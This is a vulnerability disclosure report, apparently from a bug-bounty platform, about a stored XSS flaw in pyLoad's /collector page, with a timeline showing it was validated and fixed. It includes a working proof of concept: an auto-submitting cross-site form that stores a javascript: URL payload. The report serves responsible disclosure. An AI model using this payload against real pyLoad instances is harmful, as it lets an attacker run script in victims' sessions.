Stored XSS in pyload/pyload

Status: Valid

Reported on Jan 9th 2023


Description

The /collector page is vulnerable to stored XSS: a package URL with a javascript: scheme submitted to /flash/add is stored and later rendered on the collector page as a clickable link.

PoC

  1. Open the following file in the browser:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:9666/flash/add" method="POST">
      <input type="hidden" name="package" value="XSS" />
      <input type="hidden" name="urls" value="javascript&#58;alert&#40;&#96;XSS&#96;&#41;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
  2. Log in as a user.
  3. Go to http://localhost:9666/collector
  4. Click the package XSS, then the link alert(`XSS`); the JavaScript payload executes.

Impact

An attacker can force a victim to run malicious JavaScript code.

Timeline

We are processing your report and will contact the pyload team within 24 hours (3 months ago)
bAu modified the report (3 months ago)
We have contacted a member of the pyload team and are waiting to hear back (3 months ago)
pyload/pyload maintainer validated this vulnerability (2 months ago)
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
pyload/pyload maintainer marked this as fixed in 0.5.0b3.dev42 with commit 46d75a (2 months ago)
The fix bounty has been dropped
This vulnerability has been assigned a CVE
pyload/pyload maintainer published this vulnerability (2 months ago)